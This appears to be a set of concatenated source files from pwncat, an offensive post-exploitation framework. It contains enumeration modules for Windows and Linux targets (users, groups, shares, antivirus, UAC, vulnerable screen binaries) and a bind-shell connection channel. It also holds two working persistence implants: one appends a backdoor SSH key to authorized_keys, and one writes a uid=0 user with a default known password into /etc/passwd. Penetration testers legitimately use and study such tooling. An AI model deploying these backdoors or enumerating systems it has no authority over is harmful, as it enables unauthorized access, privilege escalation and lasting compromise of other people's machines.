        # then we create one and add it to `self.logger`
        # otherwise if there is a handler for it
        # then we remove it and set it to `None`

        if verbose and self._verbose_logging_handler is None:
            self._verbose_logging_handler = RichHandler()
            self.logger.addHandler(self._verbose_logging_handler)
        elif not verbose and self._verbose_logging_handler is not None:
            self.logger.removeHandler(self._verbose_logging_handler)
            self._verbose_logging_handler = None


def register(platform: Type[Platform]):
    """
    Register a platform class to be automatically constructed with the
    ``create`` factory function with the given name. This can be used
    to register new custom platforms in plugins.

    :param name: the name of the new platform
    :type name: str
    :param platform: the platform class
    :type platform: Type[Platform]
    """

    global PLATFORM_TYPES

    PLATFORM_TYPES[platform.name] = platform


def find(name: str) -> Type[Platform]:
    """
    Retrieve the platform class for the specified name

    :param name: name of the platform
    :type name: str
    :return: the platform class
    :rtype: Type[Platform]
    :raises: KeyError: if the specified platform does not exist
    """

    global PLATFORM_TYPES

    return PLATFORM_TYPES[name]


def create(
    platform: str,
    log: str = None,
    channel: Optional[pwncat.channel.Channel] = None,
    **kwargs,
):
    """
    Create a new platform object with a registered platform type.
    If no channel is specified, then this will attempt to utilize
    the ``pwncat.channel.create`` factory function to create a
    channel. In this case, all keyword arguments are passed to the
    channel creation function and a platform is created around the
    channel.

    :param platform: the name of the platform to construct
    :type platform: str
    :param channel: the C2 channel to use for communication
    :type channel: pwncat.channel.Channel
    :return: A newly created platform around the specified channel
    :rtype: Platform
    :raises:
      KeyError: if the specified platform does not exist
      ChannelError: if a channel could not be created
    """

    if channel is None:
        channel = pwncat.channel.create(**kwargs)

    return find(platform)(channel, log)


from pwncat.platform.linux import Linux  # noqa: E402
from pwncat.platform.windows import Windows  # noqa: E402

register(Linux)
register(Windows)



#!/usr/bin/env python3


import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.windows import Windows
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: This should use csvreader.
"""

"""
TODO: We could parse the `type` here and determine if we have access to
non-default network shares?
https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/getaccessmask-method-in-class-win32-share
"""


class NetworkShare(Fact):
    def __init__(
        self,
        source,
        name: str,
        caption: str,
        tag: str,
        install_date: str,
        path: str,
        status: str,
        share_type: str,
    ):
        super().__init__(source=source, types=["network.shares"])

        self.name: str = name
        self.install_date: str = install_date
        self.tag: str = tag
        self.share_type: str = share_type
        self.path: str = path
        self.status: str = status
        self.caption: str = caption

    def title(self, session):
        out = f"[dim][cyan]{rich.markup.escape(self.name)}[/cyan] {rich.markup.escape(self.tag)}"
        if self.path:
            out += f" at [blue]{rich.markup.escape(self.path)} [/blue][/dim]"
        else:
            out += "[/dim]"
        if self.tag.lower() not in ["remote admin", "default share", "remote ipc"]:
            out = (
                out.replace("[dim]", "[bold]")
                .replace("[/dim]", "[/bold]")
                .replace("[cyan]", "[green]")
                .replace("[/cyan]", "[/green]")
            )
        return out


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["network.shares"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        proc = session.platform.Popen(
            [
                "wmic.exe",
                "share",
                "get",
                "/Format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                if (
                    not line
                    or "Node,AccessMask,AllowMaximum,Caption,Description,InstallDate,MaximumAllowed,Name,Path,Status,Type"
                    in line
                ):
                    continue

                (
                    _,
                    access_mask,
                    allow_maximum,
                    caption,
                    tag,
                    install_date,
                    maximum_allowed,
                    name,
                    path,
                    status,
                    share_type,
                ) = line.split(",")
                yield NetworkShare(
                    self.name,
                    caption=caption,
                    tag=tag,
                    install_date=install_date,
                    name=name,
                    path=path,
                    status=status,
                    share_type=share_type,
                )

        proc.wait()



#!/usr/bin/env python3


import rich.markup

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class InstalledProgramData(Fact):
    def __init__(self, source, path: bool):
        super().__init__(source=source, types=["system.programs"])

        self.path: bool = path

    def title(self, session):
        return f"{rich.markup.escape(repr(self.path))}"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.programs"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        try:
            program_files = session.platform.powershell(
                'Get-ChildItem "C:\\Program Files","C:\\Program Files (x86)" -ErrorAction SilentlyContinue | Select Fullname'
            )[0]

            if not isinstance(program_files, list):
                program_files = [program_files]

            for path in program_files:
                yield InstalledProgramData(self.name, path["FullName"])

        except (PowershellError, IndexError) as exc:
            raise ModuleFailed(
                f"failed to list program file directories: {exc}"
            ) from exc



#!/usr/bin/env python3
import os
import re
import shlex

import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule

"""
TODO: This should realistically yield an ability (which can be used for
privilege escalation)... but we can implement that later.
"""


class ScreenVersion(Fact):
    def __init__(self, source, path, perms, vulnerable):
        super().__init__(source=source, types=["software.screen.version"])

        self.path: str = path
        self.perms: int = perms
        self.vulnerable: bool = vulnerable

    def title(self, session):
        return f"[cyan]{rich.markup.escape(self.path)}[/cyan] (perms: [blue]{oct(self.perms)[2:]}[/blue]) [bold red]is vulnerable[/bold red]"


class Module(EnumerateModule):
    """
    Locate installations of the ``screen`` tool. This is useful because
    it may be vulnerable to a privilege escalation vulnerability depending
    on it's version.
    """

    PROVIDES = ["software.screen.version"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):
        """
        Enumerate locations of vulnerable screen versions
        :return:
        """

        # Grab current path plus other interesting paths
        paths = set(session.platform.getenv("PATH").split(":"))
        paths = paths | {
            "/bin",
            "/sbin",
            "/usr/local/bin",
            "/usr/local/sbin",
            "/usr/bin",
            "/usr/sbin",
        }

        # Look for matching binaries
        proc = session.platform.Popen(
            f"find {shlex.join(paths)} \\( -type f -or -type l \\) -executable \\( -name 'screen' -or -name 'screen-*' \\) -printf '%#m %p\\n' 2>/dev/null",
            shell=True,
            text=True,
            stdout=pwncat.subprocess.PIPE,
        )

        # First, collect all the paths to a `screen` binary we can find
        screen_paths = []
        for line in proc.stdout:
            line = line.strip()
            perms, *path = line.split(" ")
            path = " ".join(path)
            perms = int(perms, 8)

            # When the screen source code is on disk and marked as executable, this happens...
            if os.path.splitext(path)[1] in [".c", ".o", ".h"]:
                continue

            if perms & 0o4000:
                # if this is executable
                screen_paths.append((path, perms))

        # Clean up the search
        proc.wait()

        # Now, check each screen version to determine if it is vulnerable
        for screen_path, perms in screen_paths:
            version_output = session.platform.Popen(
                f"{screen_path} --version",
                shell=True,
                text=True,
                stdout=pwncat.subprocess.PIPE,
            )
            for line in version_output.stdout:
                # This process checks if it is a vulnerable version of screen
                match = re.search(r"(\d+\.\d+\.\d+)", line)
                if not match:
                    continue

                version_triplet = [int(x) for x in match.group().split(".")]

                if version_triplet[0] > 4:
                    continue

                if version_triplet[0] == 4 and version_triplet[1] > 5:
                    continue

                if (
                    version_triplet[0] == 4
                    and version_triplet[1] == 5
                    and version_triplet[2] >= 1
                ):
                    continue

                yield ScreenVersion(self.name, path, perms, vulnerable=True)

            # Clean up process
            version_output.wait()



#!/usr/bin/env python3
import os
import pathlib

import pwncat
from pwncat.facts import PrivateKey
from pwncat.modules import Status, Argument, ModuleFailed
from pwncat.platform.linux import Linux
from pwncat.modules.implant import ImplantModule


class AuthorizedKeyImplant(PrivateKey):
    """A public key added to a user's authorized keys file"""

    def __init__(self, source, user, key, pubkey):
        super().__init__(
            source=source,
            path=key,
            uid=user.id,
            content=pathlib.Path(key).read_text(),
            encrypted=False,
            authorized=True,
        )

        self.pubkey = pubkey

    def title(self, session: "pwncat.manager.Session"):
        """Provide a human-readable description"""
        user = session.find_user(uid=self.uid)
        return f"backdoor public key added to [blue]{user.name}[/blue] authorized_keys"

    def description(self, session: "pwncat.manager.Session"):
        """We don't want to print the whole key, since we installed it."""
        return None

    def remove(self, session: "pwncat.manager.Session"):
        """Normal private key facts don't remove the key, but we need to. In this
        case the fact is removed as well, unlike a standard private key fact."""

        current_user = session.current_user()
        user = session.find_user(uid=self.uid)

        if current_user.id != self.uid and current_user.id != 0:
            raise ModuleFailed(f"must be root or {user.name}")

        # Ensure the directory exists
        homedir = session.platform.Path(user.home)
        if not (homedir / ".ssh").is_dir():
            return

        authkeys_path = homedir / ".ssh" / "authorized_keys"

        if not authkeys_path.is_file():
            return

        try:
            with authkeys_path.open("r") as filp:
                authkeys = [line for line in filp.readlines() if line != self.pubkey]
        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc

        try:
            with authkeys_path.open("w") as filp:
                filp.writelines(authkeys)
        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc

        # Fix permissions (in case the file was replaced by the above write)
        session.platform.chown(str(authkeys_path), user.id, user.gid)
        authkeys_path.chmod(0o600)


class Module(ImplantModule):
    """
    Install the custom backdoor key-pair as an authorized key for
    the specified user. This method only succeeds for a user other
    than the current user if you are currently root.
    """

    PLATFORM = [Linux]
    ARGUMENTS = {
        **ImplantModule.ARGUMENTS,
        "user": Argument(
            str,
            default="__pwncat_current__",
            help="the user for which to install the implant (default: current user)",
        ),
        "key": Argument(str, help="path to keypair which will be added for the user"),
    }

    def install(self, session: "pwncat.manager.Session", user, key):

        yield Status("verifying user permissions")
        current_user = session.current_user()
        if user != "__pwncat_current__" and current_user.id != 0:
            raise ModuleFailed("only root can install implants for other users")

        if not os.path.isfile(key):
            raise ModuleFailed(f"private key {key} does not exist")

        try:
            yield Status("reading public key")
            with open(key + ".pub", "r") as filp:
                pubkey = filp.read().rstrip("\n") + "\n"
        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc

        # Parse user name (default is current user)
        if user == "__pwncat_current__":
            user_info = current_user
        else:
            user_info = session.find_user(name=user)

        # Ensure the user exists
        if user_info is None:
            raise ModuleFailed(f"user [blue]{user}[/blue] does not exist")

        # Ensure we haven't already installed for this user
        for implant in session.run("enumerate", types=["implant.*"]):
            if implant.source == self.name and implant.uid == user_info.uid:
                raise ModuleFailed(
                    f"{self.name} already installed for {user_info.name}"
                )

        # Ensure the directory exists
        yield Status("locating authorized keys")
        homedir = session.platform.Path(user_info.home)
        if not (homedir / ".ssh").is_dir():
            (homedir / ".ssh").mkdir(parents=True, exist_ok=True)

        authkeys_path = homedir / ".ssh" / "authorized_keys"

        if authkeys_path.is_file():
            try:
                yield Status("reading authorized keys")
                with authkeys_path.open("r") as filp:
                    authkeys = filp.readlines()
            except (FileNotFoundError, PermissionError) as exc:
                raise ModuleFailed(str(exc)) from exc
        else:
            authkeys = []

        # Add the public key to authorized keys
        authkeys.append(pubkey)

        try:
            yield Status("patching authorized keys")
            with authkeys_path.open("w") as filp:
                filp.writelines(authkeys)
        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc

        # Ensure correct permissions
        yield Status("fixing authorized keys permissions")
        session.platform.chown(str(authkeys_path), user_info.id, user_info.gid)
        authkeys_path.chmod(0o600)

        return AuthorizedKeyImplant(self.name, user_info, key, pubkey)



#!/usr/bin/env python3

import pwncat
from pwncat.modules import ModuleFailed
from pwncat.facts.windows import WindowsUser
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Enumerate users from a windows target"""

    PROVIDES = ["user"]
    PLATFORM = [Windows]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):

        try:
            users = session.platform.powershell("Get-LocalUser")
            if not users:
                raise ModuleFailed("no users returned from Get-Localuser")
        except PowershellError as exc:
            raise ModuleFailed(str(exc)) from exc

        users = users[0]

        for user in users:
            yield WindowsUser(
                source=self.name,
                name=user["Name"],
                uid=user["SID"],
                account_expires=None,
                description=user["Description"],
                enabled=user["Enabled"],
                full_name=user["FullName"],
                password_changeable_date=None,
                password_expires=None,
                user_may_change_password=user["UserMayChangePassword"],
                password_required=user["PasswordRequired"],
                password_last_set=None,
                last_logon=None,
                principal_source=user["PrincipalSource"],
            )

        well_known = {
            "S-1-0-0": "NULL AUTHORITY\\NOBODY",
            "S-1-1-0": "WORLD AUTHORITY\\Everyone",
            "S-1-2-0": "LOCAL AUTHORITY\\Local",
            "S-1-3-0": "CREATOR AUTHORITY\\Creator Owner",
            "S-1-3-1": "CREATOR AUTHORITY\\Creator Group",
            "S-1-3-4": "CREATOR AUTHORITY\\Owner Rights",
            "S-1-4": "NONUNIQUE AUTHORITY",
            "S-1-5-1": "NT AUTHORITY\\DIALUP",
            "S-1-5-2": "NT AUTHORITY\\NETWORK",
            "S-1-5-3": "NT AUTHORITY\\BATCH",
            "S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
            "S-1-5-6": "NT AUTHORITY\\SERVICE",
            "S-1-5-7": "NT AUTHORITY\\ANONYMOUS",
            "S-1-5-9": "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
            "S-1-5-10": "NT AUTHORITY\\PRINCIPAL SELF",
            "S-1-5-11": "NT AUTHORITY\\AUTHENTICATED USERS",
            "S-1-5-12": "NT AUTHORITY\\RESTRICTED CODE",
            "S-1-5-13": "NT AUTHORITY\\TERMINAL SERVER USERS",
            "S-1-5-14": "NT AUTHORITY\\REMOTE INTERACTIVE LOGON",
            "S-1-5-17": "NT AUTHORITY\\IUSR",
            "S-1-5-18": "NT AUTHORITY\\SYSTEM",
            "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
            "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
        }

        for sid, name in well_known.items():
            yield WindowsUser(
                source=self.name,
                name=name,
                uid=sid,
                account_expires=None,
                description=None,
                enabled=True,
                full_name=name,
                password_changeable_date=None,
                password_expires=None,
                user_may_change_password=None,
                password_required=None,
                password_last_set=None,
                last_logon=None,
                principal_source="well known sid",
                well_known=True,
            )



#!/usr/bin/env python3

import pwncat
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Load modules from the specified directory. This does not remove
    currently loaded modules, but may replace modules which were already
    loaded. Also, prior to loading any specified modules, the standard
    modules are loaded. This normally happens only when modules are first
    utilized. This ensures that a standard module does not shadow a custom
    module. In fact, the opposite may happen in a custom module is defined
    with the same name as a standard module.
    """

    PROG = "load"
    ARGS = {
        "path": Parameter(
            Complete.LOCAL_FILE,
            help="Path to a python package directory to load modules from",
            nargs="+",
        )
    }
    DEFAULTS = {}
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):

        manager.load_modules(args.path)



#!/usr/bin/env python3
import crypt

import pwncat
from pwncat.facts import Implant, ImplantType
from pwncat.modules import Status, Argument, ModuleFailed
from pwncat.platform.linux import Linux
from pwncat.modules.implant import ImplantModule


class PasswdImplant(Implant):
    """Implant tracker for a user added directly to /etc/passwd"""

    def __init__(self, source, user, password, added_line):
        super().__init__(source=source, types=["implant.replace"], uid=0)

        self.user = user
        self.password = password
        self.added_line = added_line

    def escalate(self, session: "pwncat.manager.Session"):
        """Escalate privileges to the fake root account"""

        try:
            session.platform.su(self.user, password=self.password)
            return lambda session: session.platform.channel.send(b"exit\n")
        except PermissionError:
            raise ModuleFailed(f"authentication as {self.user} failed")

    def remove(self, session: "pwncat.manager.Session"):
        """Remove the added line"""

        if session.platform.getuid() != 0:
            raise ModuleFailed("removal requires root privileges")

        try:
            with session.platform.open("/etc/passwd", "r") as filp:
                passwd_contents = [line for line in filp if line != self.added_line]
        except (FileNotFoundError, PermissionError):
            raise ModuleFailed("failed to read /etc/passwd")

        try:
            with session.platform.open("/etc/passwd", "w") as filp:
                filp.writelines(passwd_contents)
        except (FileNotFoundError, PermissionError):
            raise ModuleFailed("failed to write /etc/passwd")

    def title(self, session: "pwncat.manager.Session"):
        return f"""[blue]{self.user}[/blue]:[red]{self.password}[/red] added to [cyan]/etc/passwd[/cyan] w/ uid=0"""


class Module(ImplantModule):
    """Add a user to /etc/passwd with a known password and UID/GID of 0."""

    TYPE = ImplantType.REPLACE
    PLATFORM = [Linux]
    ARGUMENTS = {
        **ImplantModule.ARGUMENTS,
        "backdoor_user": Argument(
            str, default="pwncat", help="name of new uid=0 user (default: pwncat)"
        ),
        "backdoor_pass": Argument(
            str, default="pwncat", help="password for new user (default: pwncat)"
        ),
        "shell": Argument(
            str, default="current", help="shell for new user (default: current)"
        ),
    }

    def install(
        self,
        session: "pwncat.manager.Session",
        backdoor_user,
        backdoor_pass,
        shell,
    ):
        """Add the new user"""

        if session.current_user().id != 0:
            raise ModuleFailed("installation required root privileges")

        if shell == "current":
            shell = session.platform.getenv("SHELL")
        if shell is None:
            shell = "/bin/sh"

        try:
            yield Status("reading passwd contents")
            with session.platform.open("/etc/passwd", "r") as filp:
                passwd_contents = list(filp)
        except (FileNotFoundError, PermissionError):
            raise ModuleFailed("failed to read /etc/passwd")

        # Hash the password
        yield Status("hashing password")
        backdoor_hash = crypt.crypt(backdoor_pass, crypt.METHOD_SHA512)

        # Store the new line we are adding
        new_line = f"""{backdoor_user}:{backdoor_hash}:0:0::/root:{shell}\n"""

        # Add the new line
        passwd_contents.append(new_line)

        try:
            # Write the new contents
            yield Status("patching /etc/passwd")
            with session.platform.open("/etc/passwd", "w") as filp:
                filp.writelines(passwd_contents)

            # Return an implant tracker
            return PasswdImplant(self.name, backdoor_user, backdoor_pass, new_line)
        except (FileNotFoundError, PermissionError):
            raise ModuleFailed("failed to write /etc/passwd")



#!/usr/bin/env python3


from pwncat import util
from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule


class InitSystemData(Fact):
    def __init__(self, source, init, version):
        super().__init__(source=source, types=["system.init"])

        self.init: util.Init = init
        self.version: str = version

    def title(self, session):
        return f"Running [blue]{self.init}[/blue]"


class Module(EnumerateModule):
    """
    Enumerate system init service
    :return:
    """

    PROVIDES = ["system.init"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        init = util.Init.UNKNOWN
        version = None

        # Try to get the command name of the running init process
        try:
            with session.platform.open("/proc/1/comm", "r") as filp:
                comm = filp.read().strip()
            if comm is not None:
                if "systemd" in comm.lower():
                    init = util.Init.SYSTEMD
                elif "sysv" in comm.lower():
                    init = util.Init.SYSV
                elif "upstart" in comm.lower():
                    init = util.Init.UPSTART
        except (PermissionError, FileNotFoundError):
            comm = None

        # Try to get the command name of the running init process
        try:
            with session.platform.open("/proc/1/cmdline", "r") as filp:
                comm = filp.read().strip().split("\x00")[0]
        except (PermissionError, FileNotFoundError):
            comm = None

        if comm is not None:
            if "systemd" in comm.lower():
                init = util.Init.SYSTEMD
            elif "sysv" in comm.lower():
                init = util.Init.SYSV
            elif "upstart" in comm.lower():
                init = util.Init.UPSTART

        proc = session.platform.run(f"{comm} --version", capture_output=True, text=True)
        version = ""
        if proc.stdout:
            version = proc.stdout.strip()
            if "systemd" in version.lower():
                init = util.Init.SYSTEMD
            elif "sysv" in version.lower():
                init = util.Init.SYSV
            elif "upstart" in version.lower():
                init = util.Init.UPSTART

        # No need to provide an empty version string. They apparently don't support "--version"
        if version == "":
            version = None

        yield InitSystemData(self.name, init, version)



"""
Connect to a listening target server. This is slightly counter intuitive.
In this case, we are referring to connecting from the attacker perspective.
The victim would have received a bind shell payload, and is listening for
connection on a known port.

The only required arguments are ``host`` and ``port``.
"""
import socket

from rich.progress import Progress, BarColumn

from pwncat.util import console
from pwncat.channel import ChannelError
from pwncat.channel.socket import Socket


class Connect(Socket):
    """
    Implements a channel which rides over a shell attached
    directly to a socket. This channel will connect to a
    target at the specified host and port, and assume a shell is connected.
    """

    def __init__(self, host: str, port: int, **kwargs):
        if not host:
            raise ChannelError(self, "no host address provided")

        if port is None:
            raise ChannelError(self, "no port provided")

        if isinstance(port, str):
            try:
                port = int(port)
            except ValueError:
                raise ChannelError(self, "invalid port")

        with Progress(
            f"connecting to [blue]{host}[/blue]:[cyan]{port}[/cyan]",
            BarColumn(bar_width=None),
            transient=True,
            console=console,
        ) as progress:
            progress.add_task("connecting", total=1, start=False)
            # Connect to the remote host

            # If we get an invalid host from the user, that cannot be resolved
            # then we capture the GAI (getaddrinfo) exception and raise it as ChannelError
            # so that it is handled properly by the parent methods

            # We also try to catch ConnectionRefusedError after it
            # this is caused when a wrong port number is used

            try:
                client = socket.create_connection((host, port))
            except socket.gaierror:
                raise ChannelError(self, "unable to resolve host")
            except ConnectionRefusedError:
                raise ChannelError(self, "connection refused, check your port")
            except OSError:
                raise ChannelError(self, "invalid host provided")

            progress.log(
                f"connection to "
                f"[blue]{host}[/blue]:[cyan]{port}[/cyan] [green]established[/green]"
            )

        super().__init__(client=client, host=host, port=port, **kwargs)



#!/usr/bin/env python3

import pwncat
from pwncat.modules import Status, ModuleFailed
from pwncat.facts.linux import LinuxGroup
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Enumerate users from a linux target"""

    PROVIDES = ["group"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):

        # Grab all the users and sort by their group ID
        users = {user.gid: user for user in session.run("enumerate", types=["user"])}

        group_file = session.platform.Path("/etc/group")
        groups = []

        try:
            with group_file.open("r") as filp:
                for group_line in filp:
                    try:
                        # Extract the group fields
                        (group_name, hash, gid, members) = group_line.split(":")
                        gid = int(gid)
                        members = [m.strip() for m in members.split(",") if m.strip()]

                        if gid in users:
                            members.append(users[gid].name)

                        # Build a group object
                        groups.append(
                            LinuxGroup(self.name, group_name, hash, gid, members)
                        )

                        yield Status(group_name)

                    except (KeyError, ValueError, IndexError):
                        # Bad group line
                        continue

            yield from groups

        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc



#!/usr/bin/env python3


import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.windows import Windows
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: This should use csvreader.
"""


class MountedDrive(Fact):
    def __init__(
        self, source, drive_letter: str, tag: str, drive_name: str, system_name: str
    ):
        super().__init__(source=source, types=["system.drives"])

        self.drive_letter: str = drive_letter
        self.tag: str = tag
        self.drive_name: str = drive_name
        self.system_name: str = system_name

    def title(self, session):
        return f"{rich.markup.escape(self.drive_letter)}:\\ '{rich.markup.escape(self.drive_name)}' mounted from [cyan]{rich.markup.escape(self.system_name)}[/cyan] ([blue]{rich.markup.escape(self.tag)}[/blue])"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.drives"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        proc = session.platform.Popen(
            [
                "wmic",
                "logicaldisk",
                "get",
                "caption,description,volumename,systemname",
                "/format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                if not line or "Caption,Description,SystemName,VolumeName" in line:
                    continue

                _, drive_letter, tag, system_name, drive_name = line.split(",")
                yield MountedDrive(
                    self.name, drive_letter[0], tag, drive_name, system_name
                )

        proc.wait()



#!/usr/bin/env python3

import pwncat
from pwncat.modules import ModuleFailed
from pwncat.facts.windows import WindowsGroup
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Enumerate groups from a windows target"""

    PROVIDES = ["group"]
    PLATFORM = [Windows]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield WindowsGroup objects"""

        try:
            groups = session.platform.powershell("Get-LocalGroup")
            if not groups:
                raise ModuleFailed("no groups returned from Get-LocalGroup")
        except PowershellError as exc:
            raise ModuleFailed(str(exc)) from exc

        for group in groups[0]:
            try:
                members = session.platform.powershell(
                    f"Get-LocalGroupMember {group['Name']}"
                )
                if members:
                    members = (
                        [m["SID"] for m in members[0]]
                        if isinstance(members[0], list)
                        else [members[0]["SID"]["Value"]]
                    )
            except PowershellError:
                members = []

            yield WindowsGroup(
                source=self.name,
                name=group["Name"],
                gid=group["SID"],
                description=group["Description"],
                principal_source=group["PrincipalSource"],
                members=members,
            )



#!/usr/bin/env python3

import pwncat
from pwncat.facts import Implant, EscalationSpawn, EscalationReplace
from pwncat.modules.enumerate import Schedule, EnumerateModule


class ImplantEscalationReplace(EscalationReplace):
    def __init__(self, implant: Implant):
        super().__init__(implant.source, None, implant.uid)

        self.implant: Implant = implant

    def escalate(self, session: "pwncat.manager.Session"):

        return self.implant.escalate(session)

    def title(self, session: "pwncat.manager.Session"):
        return f"""implant: {self.implant.title(session)}"""


class ImplantEscalationSpawn(EscalationSpawn):
    def __init__(self, implant: Implant):
        super().__init__(implant.source, None, implant.uid)

        self.implant: Implant = implant

    def escalate(self, session: "pwncat.manager.Session"):

        return self.implant.escalate(session)

    def title(self, session: "pwncat.manager.Session"):
        return f"""implant: {self.implant.title(session)}"""


class Module(EnumerateModule):
    """Generates escalation methods based on installed implants in
    order to facilitate their usage during automated escalation."""

    PLATFORM = None
    SCHEDULE = Schedule.ALWAYS
    PROVIDES = ["escalate.replace", "escalate.spawn"]

    def enumerate(self, session):

        for implant in session.run(
            "enumerate", types=["implant.replace", "implant.spawn"]
        ):
            if "implant.replace" in implant.types:
                yield ImplantEscalationReplace(implant)
            elif "implant.spawn" in implant.types:
                yield ImplantEscalationSpawn(implant)



#!/usr/bin/env python3


import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.windows import Windows
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: This should use csvreader.
"""


class MountedDrive(Fact):
    def __init__(self, source, av_name: str, exe_path: str):
        super().__init__(source=source, types=["protection.antivirus"])

        self.av_name: str = av_name
        self.exe_path: str = exe_path

    def title(self, session):
        return f"Antivirus [red]{rich.markup.escape(self.av_name)}[/red] running from [yellow]{rich.markup.escape(self.exe_path)}[/yellow]"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["protection.antivirus"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        proc = session.platform.Popen(
            [
                "wmic.exe",
                "/Node:localhost",
                "/Namespace:\\\\root\\SecurityCenter2",
                "Path",
                "AntiVirusProduct",
                "Get",
                "displayName,pathToSignedReportingExe",
                "/Format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                if not line or "displayName,pathToSignedReportingExe" in line:
                    continue

                _, av_name, exe_path = line.split(",")
                yield MountedDrive(self.name, av_name, exe_path)

        proc.wait()



#!/usr/bin/env python3

from typing import Dict

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class UACData(Fact):
    def __init__(self, source, registry_values: Dict):
        super().__init__(source=source, types=["protections.uac"])

        self.registry_values: bool = registry_values
        """ The current setting for UAC"""

    def __getitem__(self, name):
        return self.registry_values[name]

    def title(self, session):
        if not self.registry_values["EnableLUA"]:
            return "UserAccountControl (UAC) is [bold green]inactive[/bold green]"

        return "UserAccountControl (UAC) is [bold red]active[/bold red]"

    def description(self, session):
        output = []
        if self.registry_values["EnableLUA"]:
            consent_prompt = self.registry_values["ConsentPromptBehaviorAdmin"]
            if consent_prompt == 0:
                output.append(
                    f"'ConsentPromptBehaviorAdmin' = {consent_prompt}: [bold green]UAC will not prompt[/bold green]"
                )
            if consent_prompt == 1 or consent_prompt == 3:
                output.append(
                    f"'ConsentPromptBehaviorAdmin' = {consent_prompt}: [red]admin is asked for [bold]credentials[/bold][/red]"
                )
            if consent_prompt == 2 or consent_prompt == 4:
                output.append(
                    f"'ConsentPromptBehaviorAdmin' = {consent_prompt}: [red]admin is asked for [bold]confirmation[/bold][/red]"
                )
            if consent_prompt == 5:
                output.append(
                    f"'ConsentPromptBehaviorAdmin' = {consent_prompt} (default): [red]admin is asked for [bold]confirmation[/bold][/red]"
                )

            local_account = self.registry_values["LocalAccountTokenFilterPolicy"]
            if not local_account:
                output.append(
                    f"'LocalAccountTokenFilterPolicy' = {local_account} (default): [red]only the built-in admin can perform admin tasks without UAC[/red]"
                )
            else:
                output.append(
                    f"'LocalAccountTokenFilterPolicy' = {local_account}: [yellow]all accounts in the Administrators group can perform admin tasks without UAC[/yellow]"
                )

            filter_token = self.registry_values["FilterAdministratorToken"]
            if not filter_token:
                output.append(
                    f"'FilterAdministratorToken' = {local_account} (default): [yellow]the built-in admin [bold]can[/bold] do remote administration[/yellow]"
                )
            else:
                if local_account == 1:
                    output.append(
                        f"'FilterAdministratorToken' = {local_account}: [yellow]the built-in admin [bold]can[/bold] do remote administration since 'LocalAccountTokenFilterPolicy' is {local_account}[/yellow]"
                    )
                else:
                    output.append(
                        f"'FilterAdministratorToken' = {local_account}: [red]the built-in admin [bold]cannot[/bold] do remote administration[/red]"
                    )
        else:
            return (
                None  # this is a shortform fact, so it just display only the title line
            )

        return "\n".join((" - " + line for line in output))


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["protections.uac"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        # Reference:
        # https://book.hacktricks.xyz/windows/authentication-credentials-uac-and-efs#uac

        registry_key = (
            "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\"
        )

        registry_values = {
            "EnableLUA": bool,
